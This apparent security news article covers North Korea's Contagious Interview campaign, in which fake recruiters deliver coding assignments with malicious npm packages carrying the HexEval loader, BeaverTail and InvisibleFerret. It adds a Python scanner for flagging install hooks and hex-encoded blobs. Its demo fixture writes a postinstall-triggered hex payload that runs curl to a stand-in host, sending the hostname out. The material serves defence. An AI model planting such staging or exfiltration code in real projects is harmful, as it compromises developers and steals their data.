

Ethical Hacking News

North Korean Hackers Embark on Sophisticated Supply Chain Attack Targeting Developers with 35 Malicious npm Packages



In a sophisticated supply chain attack, North Korea-linked threat actors have published 35 malicious npm packages that were collectively downloaded more than 4,000 times. The packages reach developers through a fake job-interview pretext: social engineering delivers a coding assignment that embeds them, and a malware loader inside the packages gains code execution on the victim's machine. The activity is part of the ongoing Contagious Interview campaign, whose goal is cryptocurrency and data theft.

  • A North Korea-linked supply chain attack has targeted developers with 35 malicious npm packages.
  • The attack, known as Contagious Interview, aims to obtain unauthorized access to developer systems for cryptocurrency and data theft.
  • Attackers pose as recruiters on LinkedIn, sending job seekers coding assignments that embed malicious npm packages.
  • The malicious payload includes a hex-encoded loader and a JavaScript stealer called BeaverTail, which collects sensitive data.
  • The attack employs social engineering tactics, including scripted outreach messages and convincing job descriptions.
  • The threat actors are evolving their tradecraft to blend malware staging, OSINT-driven targeting, and social engineering to compromise developers.



  • North Korea-linked Supply Chain Attack Targets Developers with 35 Malicious npm Packages

    The world of cybersecurity has witnessed numerous supply chain attacks in recent years, but one that stands out is the latest campaign undertaken by North Korean state-sponsored threat actors. According to a report by Socket, 35 malicious npm packages were identified that had been uploaded from 24 npm accounts and collectively downloaded more than 4,000 times. This campaign is part of an ongoing supply chain attack known as Contagious Interview, which aims to obtain unauthorized access to developer systems in order to conduct cryptocurrency and data theft.

    The attack involves the attackers posing as recruiters on LinkedIn and sending job seekers and developers coding assignments by sharing a link to a malicious project hosted on GitHub or Bitbucket. These projects embed the malicious npm packages among their dependencies, so the malware is pulled in as an ordinary part of the build and is easy to miss during a quick review. The threat actors exploit the trust that job seekers typically place in recruiters, initiating contact with scripted outreach messages and convincing job descriptions.

    Upon receiving these assignments, victims are coaxed into cloning and running the projects outside containerized environments during the purported interview process. This is where the malicious payload is deployed: a hex-encoded loader dubbed HexEval. Once installed, the loader collects host information and, for the targets it selects, fetches a follow-on payload, the known JavaScript stealer BeaverTail.

    BeaverTail, in turn, is configured to download and execute a Python backdoor called InvisibleFerret, enabling the threat actors to collect sensitive data and establish remote control of infected hosts. The nesting-doll structure of this attack helps evade basic static scanners and manual reviews. Moreover, one npm alias also shipped a cross-platform keylogger package that captures every keystroke, demonstrating the threat actors' readiness to tailor payloads for deeper surveillance when the target warrants it.
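    A pre-flight triage script of the kind a developer, or a security team vetting a recruiter's "assignment", can run over a cloned project before typing `npm install`. This is an added example, not code from Socket, from the campaign, or from any package named in the report. The file names, the `example.invalid` host and the fixture the script builds are constructed for the demonstration; the heuristics (npm lifecycle hooks, dependency specs that point outside the registry, long hex string literals and the `Buffer.from(..., 'hex')` idiom that decodes them) follow the staging pattern described above rather than any specific sample, so a clean result is not proof of absence.

```python
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically during `npm install`, so a command here
# executes before the candidate has read a single line of the assignment.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                   "preprepare", "prepare", "postprepare")

# Dependency specs that fetch code from outside the registry (git, tarball URL).
REMOTE_SPEC = re.compile(r"^(git\+|git:|github:|gitlab:|bitbucket:|https?://)")

# A long run of hex digits inside a string literal: the shape of a hex-encoded
# second stage. 128 hex characters is 64 bytes; raise it on noisy code bases.
HEX_LITERAL = re.compile(r"""['"`]([0-9a-fA-F]{128,})['"`]""")

# The idiom that turns such a blob back into bytes at run time.
HEX_DECODE = re.compile(r"""Buffer\.from\(\s*[^,()]+,\s*['"]hex['"]\s*\)""")

# Tokens that, once the blob is decoded, mark it as code rather than data.
SUSPICIOUS_DECODED = ("require(", "eval(", "Function(", "child_process", "http", "fetch(")


def scan_package_json(path: Path) -> list[dict]:
    """Flag install-time hooks and off-registry dependency sources in one manifest."""
    findings: list[dict] = []
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (ValueError, OSError):
        return [{"kind": "unparsable-manifest", "file": str(path), "detail": ""}]
    for hook in LIFECYCLE_HOOKS:
        cmd = data.get("scripts", {}).get(hook)
        if cmd:
            findings.append({"kind": "lifecycle-hook", "file": str(path),
                             "detail": f"{hook}: {cmd}"})
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in data.get(section, {}).items():
            if isinstance(spec, str) and REMOTE_SPEC.match(spec):
                findings.append({"kind": "remote-dependency", "file": str(path),
                                 "detail": f"{name}: {spec}"})
    return findings


def scan_js_file(path: Path) -> list[dict]:
    """Flag hex-encoded blobs (decoding them to see what they hide) and hex decoders."""
    findings: list[dict] = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for m in HEX_LITERAL.finditer(text):
        blob = m.group(1)
        decoded = bytes.fromhex(blob).decode("utf-8", errors="replace")
        hits = [tok for tok in SUSPICIOUS_DECODED if tok in decoded]
        findings.append({"kind": "hex-blob", "file": str(path),
                         "detail": f"{len(blob) // 2} bytes; decoded contains "
                                   f"{', '.join(hits) if hits else 'no known tokens'}"})
    if HEX_DECODE.search(text):
        findings.append({"kind": "hex-decode", "file": str(path),
                         "detail": "Buffer.from(..., 'hex') present"})
    return findings


def scan_project(root: str | Path) -> list[dict]:
    """Walk a cloned project (vendored node_modules included) and collect findings."""
    findings: list[dict] = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        if p.name == "package.json":
            findings.extend(scan_package_json(p))
        elif p.suffix in (".js", ".cjs", ".mjs", ".ts"):
            findings.extend(scan_js_file(p))
    return findings


def build_sample_project(malicious: bool = True) -> Path:
    """Constructed fixture for the demo: a fake 'interview task' with the staging
    pattern from the article (postinstall hook -> hex blob -> decode -> execute).
    Nothing here is a real package; the host example.invalid never resolves."""
    root = Path(tempfile.mkdtemp(prefix="assignment-"))
    manifest = {"name": "interview-task", "version": "1.0.0",
                "scripts": {"start": "node index.js"}, "dependencies": {"express": "^4.18.0"}}
    (root / "index.js").write_text("console.log('hello');\n", encoding="utf-8")
    if malicious:
        manifest["scripts"]["postinstall"] = "node ./setup.js"
        manifest["dependencies"]["helper-lib"] = "git+https://example.invalid/helper.git"
        stage2 = ("const os = require('os'); const cp = require('child_process'); "
                  "cp.exec(`curl -s http://example.invalid/?h=${os.hostname()}`);")
        (root / "setup.js").write_text(
            "const blob = '" + stage2.encode().hex() + "';\n"
            "new Function(Buffer.from(blob, 'hex').toString())();\n", encoding="utf-8")
    (root / "package.json").write_text(json.dumps(manifest, indent=2), encoding="utf-8")
    return root


if __name__ == "__main__":
    for f in scan_project(build_sample_project()):
        print(f"[{f['kind']}] {f['file']}: {f['detail']}")
```

    Run it against the clone before any `npm install` or `npm start`; decoding the hex literal is what separates a loader from, say, an embedded font. Whatever the scan says, a recruiter's assignment belongs in a disposable VM with no wallets, SSH keys or long-lived tokens on it: the campaign explicitly pushes victims out of containers, and a follow-on stage that is only fetched for selected hosts will never appear in a static scan of the repository.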

    The Contagious Interview operation is tracked under various monikers, including CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi. Recent iterations of the campaign have taken advantage of social engineering tactics such as ClickFix to deliver malware like GolangGhost and PylangGhost. This sub-cluster of activity has been designated the name ClickFake Interview.

    The latest findings from Socket point to a multi-pronged approach where Pyongyang threat actors are employing various methods to trick prospective targets into installing malware under the pretext of an interview or a Zoom meeting. This attack highlights an evolving tradecraft in North Korean supply chain attacks, one that blends malware staging, OSINT-driven targeting, and social engineering to compromise developers through trusted ecosystems.

    "They target software engineers who are actively job-hunting, exploiting the trust that job-seekers typically place in recruiters," said Socket researcher Kirill Boychenko. "Fake personas initiate contact, often with scripted outreach messages and convincing job descriptions."

    By embedding malware loaders like HexEval in open source packages and delivering them through fake job assignments, the threat actors sidestep perimeter defenses and gain execution on the systems of targeted developers. The campaign's multi-stage structure, minimal on-registry footprint, and effort to steer victims out of containerized environments point to a well-resourced adversary refining its intrusion methods in real time.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Embark-on-Sophisticated-Supply-Chain-Attack-Targeting-Developers-with-35-Malicious-npm-Packages-ehn.shtml

  • https://thehackernews.com/2025/06/north-korea-linked-supply-chain-attack.html


  • Published: Wed Jun 25 04:32:02 2025 by llama3.2 3B Q4_K_M













    © Ethical Hacking News . All rights reserved.
